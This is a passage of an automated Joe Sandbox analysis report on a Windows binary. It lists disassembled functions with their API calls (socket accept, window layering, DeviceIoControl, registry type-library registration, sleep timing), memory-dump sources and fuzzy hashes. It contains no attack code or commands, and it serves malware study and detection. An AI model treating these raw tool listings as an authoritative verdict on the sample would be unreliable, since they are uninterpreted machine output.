                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                          • String ID:
                          • API String ID: 2621361867-0
                          • Opcode ID: c59ebaa7526b1601da45d87f91888540b148b88a1737c68093e01a04bdd1b60b
                          • Instruction ID: f18b16e472ff398a1997140cc26f9ed4ba08656587fffc58c935f2826cd07357
                          • Opcode Fuzzy Hash: c59ebaa7526b1601da45d87f91888540b148b88a1737c68093e01a04bdd1b60b
                          • Instruction Fuzzy Hash: DE216D7210020DABDF119FA8ED49FEE7BE9EF04314F2440A5FA01A61A4CB76CD61DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                          Download Yara Rule
                          APIs
                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00B5906D
                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00B5907F
                          • accept.WS2_32(00000000,00000000,00000000), ref: 00B5908C
                          • WSAGetLastError.WS2_32(00000000), ref: 00B590A3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLastacceptselect
                          • String ID:
                          • API String ID: 385091864-0
                          • Opcode ID: b42b239265a4ee72530f78f955a960789127fc410138143907650f7517cec006
                          • Instruction ID: cc362a1a950b11b6af94d569e8758f2244564600e5071d4b11a92b975c2034f4
                          • Opcode Fuzzy Hash: b42b239265a4ee72530f78f955a960789127fc410138143907650f7517cec006
                          • Instruction Fuzzy Hash: E12154759001249FC710DF69D885A9ABBFCEF49710F0481AAF849D7291DB749E85CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B68834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00B688A3
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B688BD
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B688CB
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B688D9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          • Opcode ID: 665ea969680e13676c57e525c7fe051ffdb9681aa39756b13daed8323dbe863f
                          • Instruction ID: 6d08d592ce32b73877e138cb9a060702b81579aede30848cff1a931a6e2b8ccd
                          • Opcode Fuzzy Hash: 665ea969680e13676c57e525c7fe051ffdb9681aa39756b13daed8323dbe863f
                          • Instruction Fuzzy Hash: 33119031345114AFDB14AB28CC45FAA7BEAEF85320F184259F916C72E2CF74AD00CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B418E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B42CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00B418FD,?,?,?,00B426BC,00000000,000000EF,00000119,?,?), ref: 00B42CB9
                            • Part of subcall function 00B42CAA: lstrcpyW.KERNEL32(00000000,?), ref: 00B42CDF
                            • Part of subcall function 00B42CAA: lstrcmpiW.KERNEL32(00000000,?,00B418FD,?,?,?,00B426BC,00000000,000000EF,00000119,?,?), ref: 00B42D10
                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00B426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00B41916
                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B4193C
                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00B41970
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen
                          • String ID: cdecl
                          • API String ID: 4031866154-3896280584
                          • Opcode ID: b3ef3161a7c9274f44566e08ad1f36b66a72973dcf68cfb34bb2bf86380b8558
                          • Instruction ID: ab20c75aab2510996e33f698d0d88045bf0ce5f4175aaa4c9b441fff950a98be
                          • Opcode Fuzzy Hash: b3ef3161a7c9274f44566e08ad1f36b66a72973dcf68cfb34bb2bf86380b8558
                          • Instruction Fuzzy Hash: D4110836110301AFDB15AF38DC59E7A77F8FF44350B80846AF806CB2A0EB719A51E7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B33D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00B33D65
                            • Part of subcall function 00B245EC: __FF_MSGBANNER.LIBCMT ref: 00B24603
                            • Part of subcall function 00B245EC: __NMSG_WRITE.LIBCMT ref: 00B2460A
                            • Part of subcall function 00B245EC: RtlAllocateHeap.NTDLL(014A0000,00000000,00000001), ref: 00B2462F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: 6a06adf8d52cdae348b9da7c3a29e7e3cd3456bc7f0929d7ac7a370bb9f40e2a
                          • Instruction ID: 5cafbdfb7b0e7ea6dfebdade79c6348e0c35f6f5263f7742c9a8a6cee97e3a6e
                          • Opcode Fuzzy Hash: 6a06adf8d52cdae348b9da7c3a29e7e3cd3456bc7f0929d7ac7a370bb9f40e2a
                          • Instruction Fuzzy Hash: BA117332505622ABDB213F74BC457AB3BD8BF44760F6045B6F94D9E2A1DF788A40C690
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B4715C
                          • _memset.LIBCMT ref: 00B4717D
                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B471CF
                          • CloseHandle.KERNEL32(00000000), ref: 00B471D8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle_memset
                          • String ID:
                          • API String ID: 1157408455-0
                          • Opcode ID: 458fe90dd0c676513d9201d2f8c1e890e7f9a6ab17ced332ab67efca1ca0a357
                          • Instruction ID: 54fb73da4ae4124b6ae3b338078b08d437d07fc605bb4bc05562e5e72a8dded6
                          • Opcode Fuzzy Hash: 458fe90dd0c676513d9201d2f8c1e890e7f9a6ab17ced332ab67efca1ca0a357
                          • Instruction Fuzzy Hash: EB11A7719412287AD720ABA5AC4DFABBBBCEF45760F10459AF504E71D0D7744F80CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B413D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00B413EE
                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B41409
                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B4141F
                          • FreeLibrary.KERNEL32(?), ref: 00B41474
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                          • String ID:
                          • API String ID: 3137044355-0
                          • Opcode ID: 1fe6cfe4ab820e521df7dd1051e587d678e25ee34e5cc755b37980c11ff2a347
                          • Instruction ID: 566389c0b59ec349dd640a32b9d86600e38891ad6d5697d7ce174576d07e0830
                          • Opcode Fuzzy Hash: 1fe6cfe4ab820e521df7dd1051e587d678e25ee34e5cc755b37980c11ff2a347
                          • Instruction Fuzzy Hash: BF217575900309ABDB209F59DC88ADABBF8EF00744F0088AA955297250DB74DB88EF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B3C285
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B3C297
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B3C2AD
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B3C2C8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: ce7164435dac24d180f12b79ec137a378029009bd5294a96a8d36edbeab80db2
                          • Instruction ID: 364dc072e5e294aa9b661628378aad36d17560dfe859b3a7a2380093a19d4539
                          • Opcode Fuzzy Hash: ce7164435dac24d180f12b79ec137a378029009bd5294a96a8d36edbeab80db2
                          • Instruction Fuzzy Hash: A0112A7A940218FFDB11DFE8CC85E9EBBB4FB08710F204091EA04B7294D671AE10DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B47C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00B47C6C
                          • MessageBoxW.USER32(?,?,?,?), ref: 00B47C9F
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B47CB5
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B47CBC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                          • String ID:
                          • API String ID: 2880819207-0
                          • Opcode ID: d9ad956f209b778ee37f4f0a365f9388e0f5de4a67b962700cdf95455dad3a4a
                          • Instruction ID: 9e15c44c167f33f960f9827d6f04e273921dda09d914a947b22fe4ae20362680
                          • Opcode Fuzzy Hash: d9ad956f209b778ee37f4f0a365f9388e0f5de4a67b962700cdf95455dad3a4a
                          • Instruction Fuzzy Hash: 7D11E572A04204ABD7119B68EC48E9A7BEDDF08724F144256F515D33A1DF708A04D7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                          Download Yara Rule
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B1C657
                          • GetStockObject.GDI32(00000011), ref: 00B1C66B
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1C675
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CreateMessageObjectSendStockWindow
                          • String ID:
                          • API String ID: 3970641297-0
                          • Opcode ID: 3e4ce88d67ddd208dfffc86be9334728871bc455197d56c1d4c7beda8e7221bf
                          • Instruction ID: d255120f9bc542d55ac39a6e7243fc54963a8ce1e0e3e2eef6045acf8607c704
                          • Opcode Fuzzy Hash: 3e4ce88d67ddd208dfffc86be9334728871bc455197d56c1d4c7beda8e7221bf
                          • Instruction Fuzzy Hash: FB11AD72501649BFDF125FA09C84EEABFA9EF09364F554252FA0453160DB32DCA0DBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B449D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                          Download Yara Rule
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?), ref: 00B449EE
                          • Sleep.KERNEL32(00000000), ref: 00B44A13
                          • QueryPerformanceCounter.KERNEL32(?), ref: 00B44A1D
                          • Sleep.KERNEL32(?), ref: 00B44A50
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CounterPerformanceQuerySleep
                          • String ID:
                          • API String ID: 2875609808-0
                          • Opcode ID: 20f2d91f3da9134439cfdf535ebf67fcb4e4a0d248cdfe0a26fef57c5cc10c52
                          • Instruction ID: 7e208c217718dec699c16c1755b46ea870baef607203f1c1766411b6b87f494b
                          • Opcode Fuzzy Hash: 20f2d91f3da9134439cfdf535ebf67fcb4e4a0d248cdfe0a26fef57c5cc10c52
                          • Instruction Fuzzy Hash: 00112A31D4052CDBCF00AFE5DA89BEEBBB4FF09751F014096E941B2190CB309660DB99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B35BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                          • Instruction ID: 788d4b239cf21b7795b48b650127074a1328f42b3f5bfa1009b5d13e97ed6491
                          • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                          • Instruction Fuzzy Hash: AB01403200064EBBCF225F88DC41CEE7FA2FB18354F688495FE1859031D636C9B1AB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B280E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B2869D: __getptd_noexit.LIBCMT ref: 00B2869E
                          • __lock.LIBCMT ref: 00B2811F
                          • InterlockedDecrement.KERNEL32(?), ref: 00B2813C
                          • _free.LIBCMT ref: 00B2814F
                          • InterlockedIncrement.KERNEL32(014B3170), ref: 00B28167
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                          • String ID:
                          • API String ID: 2704283638-0
                          • Opcode ID: f5b099acfc5b354dd6ef4deddd8cd2b41031dfa345ccf6ffd9d11ae430bc2fe0
                          • Instruction ID: 16fc942757562a5b3a539cc7cfa4755c51df96ab91eef499d7110d475a390b15
                          • Opcode Fuzzy Hash: f5b099acfc5b354dd6ef4deddd8cd2b41031dfa345ccf6ffd9d11ae430bc2fe0
                          • Instruction Fuzzy Hash: C0016D31D02631ABCB16AB65B8467A977E0FF08712F040599F818772E1CF786852CBD6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6DDEE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00B6DE07
                          • ScreenToClient.USER32(?,?), ref: 00B6DE1F
                          • ScreenToClient.USER32(?,?), ref: 00B6DE43
                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 00B6DE5E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ClientRectScreen$InvalidateWindow
                          • String ID:
                          • API String ID: 357397906-0
                          • Opcode ID: c048b6374da5b7cc7331ff81241c6ad9260bf7e199eed226205cf783efdf9e03
                          • Instruction ID: 109a5714ef27fac492729d9309b7039437b3def86105f5199d605af5a434a116
                          • Opcode Fuzzy Hash: c048b6374da5b7cc7331ff81241c6ad9260bf7e199eed226205cf783efdf9e03
                          • Instruction Fuzzy Hash: 2A11EFB9D0020DEFDB41DF99D8849EEBBF9FB08210F108166E915E3264E735AA55CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B28724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __lock.LIBCMT ref: 00B28768
                            • Part of subcall function 00B28984: __mtinitlocknum.LIBCMT ref: 00B28996
                            • Part of subcall function 00B28984: RtlEnterCriticalSection.NTDLL(00B20127), ref: 00B289AF
                          • InterlockedIncrement.KERNEL32(DC840F00), ref: 00B28775
                          • __lock.LIBCMT ref: 00B28789
                          • ___addlocaleref.LIBCMT ref: 00B287A7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
